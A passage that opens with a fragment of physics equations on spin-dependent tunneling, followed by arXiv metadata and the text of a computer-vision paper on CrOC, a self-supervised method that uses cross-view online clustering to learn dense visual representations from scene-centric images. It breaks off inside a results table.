\[\tilde{b}_{z}^{(2)} =\frac{\widetilde{\tau}_{\perp}^{2}-\widetilde{\tau}_{\uparrow}^ {2}}{\delta}+\frac{2\widetilde{E}_{z}\widetilde{\tau}_{\mathrm{sf}}^{2}}{ \widetilde{E}_{z}^{2}-\delta^{2}}, \tag{18}\] \[\tilde{b}_{\perp}^{(2)} =\widetilde{\tau}_{\mathrm{sf}}\left(\frac{\widetilde{\tau}_{ \downarrow}}{\widetilde{E}_{z}-\delta}-\frac{\widetilde{\tau}_{\uparrow}}{ \widetilde{E}_{z}+\delta}-\frac{\widetilde{\tau}_{\uparrow}+\widetilde{\tau}_ {\downarrow}}{\delta}\right). \tag{19}\] The term \(\widetilde{b}_{z}^{(2)}\) is non-zero in the presence of spin-dependent tunneling amplitudes \(|\widetilde{\tau}_{\downarrow}|\neq|\widetilde{\tau}_{\uparrow}|\), and a finite spin-flip tunneling rate \(\widetilde{\tau}_{\mathrm{sf}}\). The effective Hamiltonian is not symmetric (nor antisymmetric) in \(\delta\). However, it is symmetric under reflection \(\delta\to-\delta\) and \(\epsilon_{\rm ac}\to-\epsilon_{\rm ac}\). Under this reflection, the effective tunneling rates transform as \(\widetilde{\tau}_{\uparrow}\rightleftharpoons\widetilde{\tau}_{\downarrow}\), and \(\widetilde{\tau}_{\rm sf}\to-\widetilde{\tau}_{\rm sf}\) for an odd resonance \(E_{z}=(2k+1)\omega,k\in\mathds{Z}\), as discussed in section 3.1.
2303.13245
CrOC: Cross-View Online Clustering for Dense Visual Representation Learning
Learning dense visual representations without labels is an arduous task and more so from scene-centric data. We propose to tackle this challenging problem by proposing a Cross-view consistency objective with an Online Clustering mechanism (CrOC) to discover and segment the semantics of the views. In the absence of hand-crafted priors, the resulting method is more generalizable and does not require a cumbersome pre-processing step. More importantly, the clustering algorithm conjointly operates on the features of both views, thereby elegantly bypassing the issue of content not represented in both views and the ambiguous matching of objects from one crop to the other. We demonstrate excellent performance on linear and unsupervised segmentation transfer tasks on various datasets and similarly for video object segmentation. Our code and pre-trained models are publicly available at https://github.com/stegmuel/CrOC.
Thomas Stegmüller, Tim Lebailly, Behzad Bozorgtabar, Tinne Tuytelaars, Jean-Philippe Thiran
2023-03-23T13:24:16Z
http://arxiv.org/abs/2303.13245v1
# CrOC : Cross-View Online Clustering for Dense Visual Representation Learning ###### Abstract Learning dense visual representations without labels is an arduous task and more so from scene-centric data. We propose to tackle this challenging problem by proposing a **C**ross-view consistency objective with an **O**nline **C**lustering mechanism (CrOC) to discover and segment the semantics of the views. In the absence of hand-crafted priors, the resulting method is more generalizable and does not require a cumbersome pre-processing step. More importantly, the clustering algorithm conjointly operates on the features of both views, thereby elegantly bypassing the issue of content not represented in both views and the ambiguous matching of objects from one crop to the other. We demonstrate excellent performance on linear and unsupervised segmentation transfer tasks on various datasets and similarly for video object segmentation. Our code and pre-trained models are publicly available at [https://github.com/stgemuel/CrOC](https://github.com/stgemuel/CrOC). + Footnote †: * denotes equal contribution. ## 1 Introduction Self-supervised learning (SSL) has gone a long and successful way since its beginning using carefully hand-crafted proxy tasks such as colorization [26], jigsaw puzzle solving [32], or image rotations prediction [14]. In recent years, a consensus seems to have been reached, and _cross-view consistency_ is used in almost all state-of-the-art (SOTA) visual SSL methods [5, 6, 7, 15, 19]. In that context, the whole training objective revolves around the consistency of representation in the presence of information-preserving transformations [7], e.g., _blurring_, _cropping_, _solarization_, etc. Although this approach is well grounded in learning image-level representations in the unrealistic scenario of _object-centric_ datasets, e.g., ImageNet [11], it cannot be trivially extended to accommodate _scene-centric_ datasets and even less to learn dense representations. Indeed, in the presence of complex scene images, the random _cropping_ operation used as image transformation loses its semantic-preserving property, as a single image can yield two crops bearing antipodean semantic content [31, 35, 36, 37]. Along the same line, it's not clear how to relate sub-regions of the image from one crop to the other, which is necessary to derive a localized supervisory signal. To address the above issue, some methods [31, 36] constrain the location of the crops based on some heuristics and using a pre-processing step. This step is either not learnable or requires the use of a pre-trained model. Alternatively, the location of the crops (_geometric pooling_[45, 51]) and/or an Figure 1: **Schematic for different categories of self-supervised learning methods for dense downstream tasks. a) Prior to the training, a pre-trained model or color-based heuristic is used to produce the clustering/matching of the whole dataset. c) The matching/clustering is identified online but restrains the domain of application of the loss to the intersection of the two views. b) Our method takes the best of both worlds, leverages online clustering, and enforces constraints on the whole spatiality of the views.** attention mechanism (_attentive pooling_[33, 42, 44, 48, 51]) can be used to infer the region of overlap in each view and only apply the consistency objective to that region (Fig. 1.c). A consequence of these pooling mechanisms is that only a sub-region of each view is exploited, which mislays a significant amount of the image and further questions the usage of _cropping_. There are two strategies to tackle the issue of locating and linking the objects from the two views: the first is a feature-level approach that extends the global consistency criterion to the spatial features after inferring pairs of positives through similarity bootstrapping or positional cues [2, 28, 30, 41, 48, 51]. It is unclear how much semantics a single spatial feature embeds, and this strategy can become computationally intensive. These issues motivate the emergence of the second line of work which operates at the object-level [20, 21, 43, 44, 47, 20, 43]. In that second scenario, the main difficulty lies in generating the object segmentation masks and matching objects from one view to the other. The straightforward approach is to leverage unsupervised heuristics [20] or pre-trained models [47] to generate pseudo labels prior to the training phase (Fig. 1.a), which is not an entirely data-driven approach and cannot be trivially extended to any modalities. Alternatively, [21] proposed to use K-Means and an additional global image (encompassing the two main views) to generate online pseudo labels, but this approach is computationally intensive. To address these limitations, we propose CrOC, whose underpinning mechanism is an efficient **C**ross-view **O**nline **C**lustering that conjointly generates segmentation masks for the union of both views (Fig. 1.b). Our main contributions are: 1) we propose a novel object-level self-supervised learning framework that leverages an online clustering algorithm yielding segmentation masks for the union of two image views. 2) The introduced method is inherently compatible with scene-centric datasets and does not require a pre-trained model. 3) We empirically and thoroughly demonstrate that our approach rivals or out-competes existing SOTA self-supervised methods even when pre-trained in an unfavorable setting (smaller and more complex dataset). ## 2 Related work **Global features.** The collateral effect of [7], is that it effectively uniformized the choice of the proxy task for SSL to the extent that _cross-view consistency_ is almost exclusively used. The remaining degree of freedom lies in the technique used to avoid the collapse to trivial solutions. The use of negative samples [7, 22] effectively and intuitively treats this degeneracy at the cost of using large batches, which can be mitigated by a momentum encoder [19]. At the other end of the spectrum, clustering-based approaches [4, 5, 6, 1] have shown that enforcing equipartition of the samples over a set of clusters was sufficient to palliate the collapsing issue. **Local features.** Local methods aim at completing the image-level objective by encouraging cross-view consistency at a localized level such that the resulting features are well aligned with dense downstream tasks. Broadly speaking, these methods can be categorized by the granularity at which the similarity is enforced. The first category encompasses approaches [30, 33, 41, 27], where similarity is encouraged directly at the feature level, i.e., from one feature to the other. The difficulty lies in obtaining valid pairs or groups of features. To that end, various methods [30, 41] rely solely on the similarity of the features, whereas the matching criterion of [33, 48] is driven by their distances/positions. [27] studies both approaches and [2] incorporates both in a single objective. The second category of methods [44, 20, 21, 20, 47] enforce consistency at a higher level, which first requires finding semantically coherent groups of features. For that purpose, [47], resort to using a pre-trained model and an offline "correspondences discovery" stage to find pairs of the region of interest. Along the same line, [20] proposes to use various heuristics prior to the training phase to generate pseudo-segmentation labels. An online version of this latest algorithm has been introduced, but it requires forwarding an additional global view. Alternatively, dense fine-tuning approaches [16, 39, 49, 51] have been proposed. These methods aim to endow models pre-trained under an image-level objective [6] with local consistency properties, but cannot be trained from scratch. Finally, MAE [18] relies on a masked autoencoder pipeline and a reconstruction objective to learn dense representations. As MAE does not rely on a cross-view consistency objective, this approach is well-suited for scene-centric datasets and of particular interest to us. ## 3 Method ### Overview This paper tackles the problem of learning dense visual representations from unlabeled scene-centric data. Recent efforts using a self-supervised multi-view consistency paradigm to address this problem rely on a two steps procedure: _i) locate_ the objects in each image view and _ii) link_ the related objects from one image view to the other. We now discuss how CrOC elegantly palliates the limitations evoked in sections 1 and 2. We observe that most of the difficulties arise because the _locate-link_ strategy treats the two image views independently. In contrast, both views stem from the same image, and their representations lie in the same space. The former observation offers the possibility to benefit from the coordinates of the cropped image regions as a cue for the _locate_ step, while the latter indicates that some operations could be performed conjointly. Consequently, we propose to depart from the typical strategy and introduce a novel paradigm dubbed _join-locate-split_, described below: **Join.** The two augmented image views, \(\tilde{\mathbf{x}}_{1}\) and \(\tilde{\mathbf{x}}_{2}\), are processed by a ViT [12] encoder \(f\) yielding the dense visual representations \(\mathbf{Z}_{\{1,2\}}\in\mathbb{R}^{N\times d}\), where \(N\) and \(d\) denote the number of spatial tokens and feature dimension, respectively. The dense visual representations are then concatenated along the token axis to obtain the joint representation, \(\mathbf{Z}_{\text{cat}}\in\mathbb{R}^{2N\times d}\). **Locate.** The objective is to find semantically coherent clusters of tokens in the joint representation space. As the quality of the input representation improves, we expect the found clusters to represent the different objects or object parts illustrated in the image. The joint representation is fed to the clustering algorithm \(\mathcal{C}\), which outputs the joint clustering assignments, \(\mathbf{Q}^{*}\in\mathbb{R}^{2N\times K}\). The soft assignments matrix \(\mathbf{Q}^{*}\) models the probability of each of the \(2N\) tokens to belong to one of the \(K\) clusters found in the joint space. **Split.** By splitting \(\mathbf{Q}^{*}\) in two along the first dimension, the assignment matrix of each view, namely \(\mathbf{Q}^{*}_{\{1,2\}}\in\mathbb{R}^{N\times K}\) are obtained. One can observe that the _link_ operation is provided for free and that it is trivial to discard any cluster that does not span across the two views. Given the view-wise assignments \(\mathbf{Q}^{*}_{\{1,2\}}\), and the corresponding dense representations \(\mathbf{Z}_{\{1,2\}}\), \(K\) object/cluster-level representations can be obtained for each view: \[\mathbf{C}^{\top}_{1}=\mathbf{Z}^{\top}_{1}\mathbf{Q}^{*}_{1} \tag{1}\] \(\mathbf{C}\) denotes the centroids. Analogously to the image-level consistency objective, one can enforce similarity constraints between pairs of centroids. ### Dense self-distillation This section details the integration of the _join-locate-split_ strategy (Sec. 3.1) in a self-distillation scheme1. Our self-distillation approach relies on a teacher-student pair of Siamese networks, \(g_{t}\) and \(g_{s}\), each composed of an encoder \(f_{\{t,s\}}\) and a projection head \(h_{\{t,s\}}\). Given the input image \(\mathbf{x}\in\mathbb{R}^{C\times H\times W}\), two augmented views \(\tilde{\mathbf{x}}_{1}\) and \(\tilde{\mathbf{x}}_{2}\) are obtained using random augmentations. Both augmented views are independently passed through the teacher and student encoders, yielding the spatial representations \(\mathbf{Z}_{t,\{1,2\}}\) and \(\mathbf{Z}_{s,\{1,2\}}\), respectively. The teacher model's representations are concatenated (_join_) and fed to the clustering algorithm (Sec. 3.3) to obtain the assignment matrix \(\mathbf{Q}^{*}\) (_locate_), which is assumed to be already filtered of any column corresponding to an object/cluster represented in only one of the two views (cf. Sec. 3.3.1). The assignment matrix is _split_ view-wise to get \(\mathbf{Q}^{*}_{\{1,2\}}\) and to compute the teacher and student centroids of each view: Footnote 1: Our implementations build upon DINO [6], but it’s not limited to it. \[\mathbf{C}^{\top}_{\{t,s\},\{1,2\}}=\mathbf{Z}^{\top}_{\{t,s\},\{1,2\}} \mathbf{Q}^{*}_{\{1,2\}} \tag{2}\] The final step is to feed the teacher and student centroids, \(\mathbf{C}_{t}\) and \(\mathbf{C}_{s}\), to the corresponding projection heads, \(h_{t}\) and \(h_{s}\), which output probability distributions over \(L\) dimensions denoted by \(\mathbf{P}_{t}\) and \(\mathbf{P}_{s}\), respectively. The probabilities of the teacher and student models are obtained by normalizing their projection heads' outputs with a softmax scaled Figure 2: **Overview of CrOC.** The augmented views, \(\tilde{\mathbf{x}}_{1}\) and \(\tilde{\mathbf{x}}_{2}\), are processed independently by a ViT encoder \(f\). The _joint_ representation, \(\mathbf{Z}_{\text{cat}}\), of the two image views, is obtained by concatenation along the token axis and serves as input to the clustering algorithm, \(\mathcal{C}\), to _locate_ the objects. The joint clustering assignments, \(\mathbf{Q}^{*}\), are _split_ view-wise and used to compute the corresponding centroids. A self-distillation loss enforces consistency between pairs of related centroids via a projection head \(h\). by temperatures \(\tau_{t}\) and \(\tau_{s}\): \[\begin{split}\mathbf{P}_{t,\{1,2\}}&=\underset{L}{ \texttt{softmax}}\left(h_{t}(\mathbf{C}_{t,\{1,2\}})/\tau_{t}\right)\\ \mathbf{P}_{s,\{1,2\}}&=\underset{L}{\texttt{softmax }}\left(h_{s}(\mathbf{C}_{s,\{1,2\}})/\tau_{s}\right)\end{split} \tag{3}\] The dense self-distillation objective \(\mathcal{L}_{\text{dense}}\) enforces cross-view consistency of the teacher and student model projections using the cross-entropy loss: \[\mathcal{L}_{\text{dense}}=\frac{1}{2}\left(H(\mathbf{P}_{t,1},\mathbf{P}_{s, 2})+H(\mathbf{P}_{t,2},\mathbf{P}_{s,1})\right) \tag{4}\] where \(H(\mathbf{A},\mathbf{B})=-\frac{1}{K}\sum_{k=1}^{K}\sum_{l=1}^{L}\mathbf{A}_{ kl}\log(\mathbf{B}_{kl})\) computed by averaging over all clusters. For the dense self-distillation loss to be meaningful, the clustering assignments of spatial tokens corresponding to similar objects must be semantically coherent, which requires good-quality representations. To address this issue, we additionally apply a global representation loss by feeding the image-level representations to a dedicated projection head, \(\vec{h}\), to obtain the \(\vec{L}\)-dimensional distributions: \[\begin{split}\boldsymbol{p}_{t,\{1,2\}}&=\underset{ \vec{L}}{\texttt{softmax}}\left(\vec{h}_{t}(\vec{\boldsymbol{z}}_{t,\{1,2\}} /\tau_{t})\right)\\ \boldsymbol{p}_{s,\{1,2\}}&=\underset{\vec{L}}{ \texttt{softmax}}\left(\vec{h}_{s}(\vec{\boldsymbol{z}}_{s,\{1,2\}}/\vec{ \boldsymbol{\tau}}_{s})\right)\end{split} \tag{5}\] The sharpness of the output distribution for teacher and student models is controlled by the temperature parameters \(\vec{\tau}_{t}\) and \(\vec{\tau}_{s}\), respectively, and \(\vec{\boldsymbol{z}}_{\{t,s\}}\) denotes the image-level representations of the teacher and student models. Hence the global representation loss \(\mathcal{L}_{\text{glob}}\) is computed as follows: \[\mathcal{L}_{\text{glob}}=\frac{1}{2}\left(H(\boldsymbol{p}_{t,1},\boldsymbol{ p}_{s,2})+H(\boldsymbol{p}_{t,2},\boldsymbol{p}_{s,1})\right) \tag{6}\] where \(H(\mathbf{a},\mathbf{b})=-\sum_{l=1}^{\vec{L}}\mathbf{a}_{l}\log(\mathbf{b}_{ l})\). Therefore, the overall loss function used for the training of CrOC is: \[\mathcal{L}=\alpha\mathcal{L}_{\text{dense}}+\mathcal{L}_{\text{glob}} \tag{7}\] where \(\alpha\) denotes a hyperparameter to balance the loss terms. We set \(\alpha=1.0\) for all experiments without the need for hyperparameter tuning. ### Where are the objects in the image? So far, we assumed that there existed an algorithm able to assign a set of input data points to an undetermined number of clusters. This section covers the details of this algorithm. The online optimization objective for computing the clusters and corresponding assignments relies on an optimal transport formulation and the Sinkhorn-Knopp algorithm [10]. This choice is motivated by _i)_ its efficiency, _ii)_ the ease of incorporating external knowledge (Sec. 3.3.2), and _iii)_ it returns a measure of the clustering quality, which can be used to infer the optimal number of clusters \(K\) for a given image. The last point is of utmost importance as it allows us to devise a _ad-hoc_ selection criterion for \(K\). Indeed, the iterative procedure progressively merges the centroids until only two remain, i.e., background/foreground (see Fig. 3). The number of centroids \(K\) is selected _a posteriori_ and independently for each image in the batch. More formally, let's consider a ViT encoder \(f\) fed with a positive pair of augmented views, \(\tilde{\boldsymbol{x}}_{1}\) and \(\tilde{\boldsymbol{x}}_{2}\), and yielding the corresponding representations, \(\mathbf{Z}_{1}\) and \(\mathbf{Z}_{2}\). The clustering is performed on the joint representation, \(\mathbf{Z}_{\text{cat}}\in\mathbb{R}^{2N\times d}\) obtained from the concatenation of \(\mathbf{Z}_{1}\) and \(\mathbf{Z}_{2}\) along the token axis. The procedure starts by sampling \(K_{\text{start}}\) of the \(2N\) tokens, which serve as initialization for the centroids, \(\mathbf{C}\in\mathbb{R}^{K_{\text{cat}}\times d}\): \[\mathbf{C}=\mathbf{Y}^{\top}\mathbf{Z}_{\text{cat}} \tag{8}\] where \(\mathbf{Y}\in\{0,1\}^{2N\times K_{\text{cat}}}\) is a matrix of column one-hot vectors indicating the position of the \(K_{\text{start}}\) tokens used to initialize the centroids. The sampling is based on the _attention map_ of the [CLS] token, which highlights the patches proportionally to their contribution to the image-level representation. The cost of assigning a token to a given centroid should reflect their similarity, hence: \[\mathbf{T}^{\text{(sem)}}=-\mathbf{Z}_{\text{cat}}\mathbf{C}^{\top} \tag{9}\] where \(\mathbf{T}^{\text{(sem)}}\in\mathbb{R}^{2N\times K}\) denotes the cost matrix of the assignments. A handy property of the selected clustering algorithm is that it offers the possibility to scale the importance of the tokens and centroids based on external knowledge injected using a token distribution \(\mathbf{r}\) and a centroid distributions \(\mathbf{c}\). Here, the _attention map_ of the [CLS] token is used as the token distribution due to its ability to highlight the sensible semantic regions of the image [6]. Along the same line, the centroids distribution is defined as: \[\mathbf{c}=\underset{\mathbf{softmax}}{\text{softmax}}(\mathbf{Y}^{\top} \mathbf{r}) \tag{10}\] Given the cost matrix, \(\mathbf{T}^{\text{(sem)}}\), and the two marginals, \(\mathbf{r}\) and \(\mathbf{c}\), the Sinkhorn-Knopp clustering produces the assignment matrix \(\mathbf{Q}^{*}\): \[\mathbf{Q}^{*}=\underset{\mathbf{Q}\in\mathcal{U}(\mathbf{r},\mathbf{c})}{ \operatorname{arg\,min}}<\mathbf{Q},\mathbf{T}^{\text{(sem)}}>-\frac{1}{ \lambda}H(\mathbf{Q}) \tag{11}\] where \(<\cdot,\cdot>\) denotes the entry-wise product followed by a sum reduction. The second term is a regularization of the entropy of the assignments, i.e., it controls the sharpness of the clustering. \(\mathcal{U}(\mathbf{r},\mathbf{c})\) is the transportation polytope, i.e., the set of valid assignments defined as: \[\mathcal{U}(\mathbf{r},\mathbf{c})=\{\mathbf{Q}\in\mathbb{R}_{+}^{2N\times K} \mid\mathbf{Q}\mathbf{1}_{K}=\mathbf{r},\mathbf{Q}^{\top}\mathbf{1}_{2N}= \mathbf{c}\} \tag{12}\] Additionally, the transportation cost \(d_{\text{c}}\) measures the cost of assigning the tokens to the different centroids and can therefore be interpreted as the quality of the clustering, i.e., the ability to find a representative centroid for each token. \[d_{\text{c}}=\text{$<$}\mathbf{Q}^{*},\mathbf{T}^{\text{(sem)}}> \tag{13}\] The centroids are updated after each step (\(\mathbf{C}^{\top}=\mathbf{Z}^{\top}\mathbf{Q}^{*}\)), and the two centroids, \((i^{*},j^{*})\), having the highest cosine similarity, are merged: \[\mathbf{C},\mathbf{Y}\leftarrow\texttt{merge}(\mathbf{C},\mathbf{Y},i^{*},j^{*}) \tag{14}\] where merge denotes the merging operator; the merging procedure averages the selected columns of \(\mathbf{Y}\) and the corresponding rows of \(\mathbf{C}\); in both cases, obsolete columns/rows are simply removed from the matrices. Before reiterating through the clustering algorithm, the matrix cost, \(\mathbf{T}^{\text{(sem)}}\), and centroid distribution, \(\mathbf{c}\), are updated using Eq. 9 and Eq. 10, respectively. The whole procedure is repeated until only two centroids remain. By comparing the transportation cost \(d_{\text{c}}\) incurred at each step (from \(K_{\text{start}}\) to 2), one can select _a posteriori_ the optimal number of centroids and the corresponding assignment \(\mathbf{Q}^{*}\) for each image independently based on the \(\mathbf{Q}^{*}\) that minimizes \(d_{\text{c}}\). The procedure's final step consists of the row-wise normalization of the assignments and the pruning of clusters (cf. Sec. 3.3.1). #### 3.3.1 Cluster pruning An important property of CrOC is that it allows to easily discard clusters corresponding to content that is not shared across the two views (e.g., purple cluster corresponding to the helmet in Fig. 2). To that end, we first compute the hard version of the assignments (each token is assigned to precisely one centroid): \[\mathbf{M}_{n,k}=\mathds{1}_{k=\underset{j}{\text{argmax}}}\{\mathbf{Q}^{*}_{ nj}\} \tag{15}\] The hard assignments are split view-wise to obtain \(\mathbf{M}_{1}\) and \(\mathbf{M}_{2}\), and we introduce the sets \(\mathcal{S}_{1}\) and \(\mathcal{S}_{2}\), which store indices of the zero columns of \(\mathbf{M}_{1}\), and \(\mathbf{M}_{2}\), respectively. Therefore, any column of \(\mathbf{Q}^{*}_{\{1,2\}}\) and \(\mathbf{M}_{\{1,2\}}\), whose index is in \(\mathcal{S}=\mathcal{S}_{1}\cup\mathcal{S}_{2}\), is filtered out: \[\mathbf{Q}^{*}_{\{1,2\}},\mathbf{M}_{\{1,2\}}\leftarrow\texttt{filter}( \mathbf{Q}^{*}_{\{1,2\}},\mathbf{M}_{\{1,2\}},\mathcal{S}) \tag{16}\] where filter denotes the filtering operator, which drops the indexed columns of the input matrices. #### 3.3.2 Positional cues In Sec. 3.2, we mention the need for an image-level self-distillation loss to break the interdependence between the features' quality and the correctness of the enforced dense loss. Along the same line, positional cues can be leveraged to guide the clustering operation, such that spatially coherent clusters can be obtained even when the features do not fully capture the semantics of the underlying data. Indeed, it appears natural to bias the clustering in favor of matching together tokens resulting from the same region **in the original image**. To that end, a positional constraint is added to the matrix transportation cost \(\mathbf{T}^{\text{(sem)}}\), which is modified to incorporate this desired property. We start by observing that the augmented views, \(\tilde{\boldsymbol{x}}_{\{1,2\}}\), result from the composition and use of a set of geometric and photometric transformations on the original image Figure 4: The positional cues use the top-left corner of the **original image** as a reference point, such that the position coordinates of each view lie in the same space and can be used to guide the clustering algorithm. Figure 3: **Representation of the iterative clustering algorithm in the joint space.** The algorithm is initialized with a fixed number of centroids that are iteratively merged until only two remain. The ideal number of centroids is determined _a posteriori_. The procedure’s last seven steps (columns) are represented for three different heads of a ViT-S/16 pre-trained with CrOC. \(\mathbf{x}\). We propose to extract the coordinates of the patches in each view with respect to the original image referential (cf. Fig. 4). More precisely, we generate the tensors, \(\mathbf{E}_{\{1,2\}}\in\mathbb{R}^{N\times 2}\), which store the 2D coordinates of each patch in the two views. The coordinates are first concatenated along the patch/token axis to obtain \(\mathbf{E}_{\text{cat}}\in\mathbb{R}^{2N\times 2}\), and the positions of the centroids, \(\mathbf{E}_{\text{cen}}\in\mathbb{R}^{K_{\text{cat}}\times 2}\), are computed as in Eq. 8 (\(\mathbf{E}_{\text{cen}}=\mathbf{Y}^{\top}\mathbf{E}_{\text{cat}}\)). The entries of the positional transportation cost \(\mathbf{T}^{\text{(pos)}}\in\mathbb{R}^{2N\times K_{\text{cat}}}\) are computed as follows: \[\mathbf{T}^{\text{(pos)}}_{ij}=\frac{1}{S}||\mathbf{e}^{\text{(cat)}}_{i}- \mathbf{e}^{\text{(gen)}}_{j}||_{2} \tag{17}\] where \(S\) is a normalization constant that ensures that the entries of the positional transportation cost are in \([0,1]\). After incorporation of the positional bias, the total matrix transportation cost is defined as follows: \[\mathbf{T}^{\text{(tot)}}=\mathbf{T}^{\text{(sem)}}+\lambda_{\text{pos}} \mathbf{T}^{\text{(pos)}} \tag{18}\] The scalar weight \(\lambda_{\text{pos}}\) regulates the importance of the positional cues. As detailed in Sec. 3.3, the clustering algorithm relies on the iterative merging of the centroids; hence their respective position must also be merged reciprocally, i.e., by averaging (cf. Eq. 14). #### 3.3.3 Multiple clustering assignments using MSA In this section, we detail a mechanism to obtain multiple complementary clustering assignments \(\mathbf{Q}^{*}\) per image. This mechanism relies on the multi-head self-attention (MSA) module inherent to the transformer architecture. Arguably, the main ingredient behind the transformer architecture's success is the self-attention module. Indeed, _i)_ it allows capturing of long-range inter-dependencies between the patches that constitute the image, and _ii)_ it endows the local representations with global or contextual information. Formally, the multi-head attention operation of the \(l^{th}\) transformer block is expressed as: \[\begin{split}\texttt{multi-head}&\left(\mathbf{Z}^{(l- 1)}\right)\\ &=\texttt{concat}\left(\text{head}_{1},...,\text{head}_{n_{h}} \right)\mathbf{W}^{o}\end{split} \tag{19}\] where \(\mathbf{W}^{o}\in\mathbb{R}^{d\times d}\) is a learnable projection weight, and \(\text{head}_{i}\), for \(i=1,\cdots,n_{h}\), denotes a single attention head: \[\begin{split}\text{head}_{i}&=\texttt{attention} \left(\mathbf{Z}^{(l-1)},\mathbf{W}^{\{q,k,v\}}_{i}\right)\\ &=\texttt{softmax}\left(\frac{\mathbf{Z}^{(l-1)}\mathbf{W}^{q}_{ i}\left(\mathbf{Z}^{(l-1)}\mathbf{W}^{k}_{i}\right)^{\top}}{\sqrt{D}} \right)\mathbf{Z}^{(l-1)}\mathbf{W}^{v}_{i}\end{split} \tag{20}\] where \(\mathbf{W}^{\{q,k,v\}}_{i}\in\mathbb{R}^{d\times d/n_{h}}\) denotes head-specific learnable projection weights2. Following the same reasoning that motivates the use of multiple heads, i.e., the inter-patches relationship is not unique, we use as many clustering assignments as there are heads in the MSA module. In practice, it turns out to be as simple as independently feeding each attention head's dense representation to the clustering algorithm: Footnote 2: The layer index, which starts from 0, is omitted. \[\mathbf{Q}^{i}=\mathcal{C}\left(\mathbf{Z}^{(B-2)}\mathbf{W}^{k}_{i}\right) \tag{21}\] where \(B\) is the number of transformer blocks in the model. Note that only one of the keys/queries/values representation is used (here exemplified with the keys). Consequently, the final assignment matrix \(\mathbf{Q}^{*}\) results from the concatenation of the head-wise assignments \(\mathbf{Q}^{i}\) along the centroid dimension. Up to pruning (Sec. 3.3.1), the effective number of centroids is \(n_{h}\) times higher. Even though the clusters overlap, we do not enforce contradictory objectives as _i)_ the consistency is enforced pair-wise (from one centroid in the first view to the corresponding one in the second view) and _ii)_ in the framework of self-distillation there are no negative pairs. ## 4 Experiments ### Implementations details **Pre-training datasets.** Our models are pre-trained on two uncurated and scene-centric datasets, namely COCO (train2017, \(\sim\)118k images) and COCO+ (unlabeled2017 + train2017, \(\sim\)241k images). We further explore the possibility of using CrOC in an object-centric scenario and therefore adopt ImageNet [11] as a pre-training dataset (\(\sim 10\times\) more images and \(\sim 4\times\) fewer objects/image). **Network architecture.** We use a ViT-small (ViT-S/16) as the backbone \(f\). This choice is in line with its adoption in concurrent methods and for its comparability [6, 49, 51] with the ResNet50, which is the backbone of the remaining baselines. The architecture of the projection heads is identical to that of [6]. Notably, the image-level and centroids-level heads, \(\overline{h}\) and \(h\), share their weights except for the last layer, which has output dimensions, \(\overline{L}=65,536\) and \(L=8,192\), respectively. **Optimization.** CrOC is trained for 300 epochs on COCO and COCO+ under an identical optimization scheme. A batch size of 256, distributed over 2 Tesla V100 GPUs is used. The pre-training on ImageNet uses a batch size of 1024, distributed over 4 AMD MI250X GPUs. The remaining optimization setting is identical to that of DINO [6]. **Hyperparameters.** The same weight is given to the dense and global loss, i.e., \(\alpha=1\). We use \(\lambda=20\) for the regularization term of the transportation objective. The dense and global projection heads use the same temperature parameters, namely \(\overline{\tau}_{s}=\tau_{s}=0.1\) and \(\overline{\tau}_{t}=\tau_{t}=0.07\) (see Eqs. 3 & 5). Generally, any hyper-parameter common to DINO uses its recommended value. The results of section 4.3 which use COCO or COCO+ as pre-training datasets are obtained with \(\lambda_{\text{pos}}=4\), \(K_{\text{start}}=12\) and the values tokens as parameters of the clustering algorithm. For ImageNet, we only report results with \(\lambda_{\text{pos}}=3\), \(K_{\text{start}}=12\) and the keys tokens. These values correspond to the default setting of the grid search performed on COCO (see Sec. 4.4). ### Evaluation protocols We opt for dense evaluation downstream tasks, which require as little manual intervention as possible, such that the reported results truly reflect the quality of the features. Details of the implementations and datasets are available in Appendix C. **Transfer learning via linear segmentation.** The linear separability of the learned spatial features is evaluated by training a linear layer on top of the frozen features of the pre-trained encoder. The linear layer implements a mapping from the embedding space to the label space and is trained to minimize the cross-entropy loss. We report the mean Intersection over Union (mIoU) of the resulting segmentation maps on four different datasets, namely, PVOC12 [13], COCO-Things, COCO-Stuff [29] and ADE20K [50]. **Transfer learning via unsupervised segmentation.** We evaluate the ability of the methods to produce spatial features that can be grouped into coherent clusters. We perform K-Means clustering on the spatial features of every image in a given dataset with as many centroids as there are classes in the dataset. Subsequently, a label is assigned to each cluster via Hungarian matching [25]. We report the mean Intersection over Union (mIoU) of the resulting segmentation maps on three different datasets, namely PVOC12 [13], COCO-Things, and COCO-Stuff [29]. **Semi-supervised video object segmentation.** We assess our method's generalizability for semi-supervised video object segmentation on the DAVIS'17 benchmark. The purpose of this experiment is to evaluate the spatiotemporal consistency of the learned features. First, the features of each frame in a given video are independently obtained; secondly, a nearest-neighbor approach is used to propagate (from one frame to the next) the ground-truth labels of the first frame (see results in Appendix D). ### Segmentation results In Tables 1 and 2, we report mIoU results on the linear segmentation task. When pre-trained on COCO, CrOC exceeds concurrent methods using COCO(+) as pre-training datasets, even though ORL and BYOL use a longer training protocol (800 epochs). With a pre-training on COCO+, CrOC outperforms all other methods, except CP\({}^{2}\)[39], on every evaluation dataset, despite their usage of ImageNet and their finetuning on one of the target datasets (PVOC12). Noteworthy that CP\({}^{2}\) is initialized with a pre-trained model and cannot be trained from scratch. Pre-training on a larger and object-centric dataset appears to be highly beneficial in that setting. In Table 3, the results for the unsupervised segmentation task are reported. As for linear segmentation experiments, CrOC is already competitive with only a pre-training on the COCO dataset and surpasses all competing methods except DenseCL [41]. The largest improvements are observed on the COCO-Stuff dataset; this is unsurprising as this dataset contains semantic labels such as water, ground, or sky, which correspond to regions that are typically overlooked by other methods, but on which CrOC puts a significant emphasis. The model pre-trained on ImageNet appears to perform poorly on that task, which is surprising considering the excellent results depicted in Table 1 on the exact same datasets. This might hint that \begin{table} \begin{tabular}{l l c c c c} \hline \hline Method & Model / Dataset & PVOC12 & CC-Th. & CC-St. & Avg. \\ \hline _Global features_ & & & & & \\ BYOL [15] & ResNet50 / CC+ & 38.7 & 50.4 & 39.8 & 43.0 \\ DINO [6] & ViT-S/16 / CC & 47.2 & 47.1 & 46.2 & 46.8 \\ \hline _Local features_ & & & & & \\ ORL [7] & ResNet50 / CC+ & 45.2 & 55.6 & 45.6 & 48.8 \\ Dennet [41] & ResNet50 / IN & 57.9 & 60.4 & 47.5 & 55.3 \\ SoCo [43] & ResNet50 / IN & 54.0 & 56.8 & 44.2 & 51.7 \\ ResSim [45] & ResNet50 / IN & 55.1 & 57.7 & 46.5 & 53.1 \\ FixPro [48] & ResNet50 / IN & 57.1 & 54.7 & 45.9 & 52.6 \\ VICRegL [2] & ResNet50 / 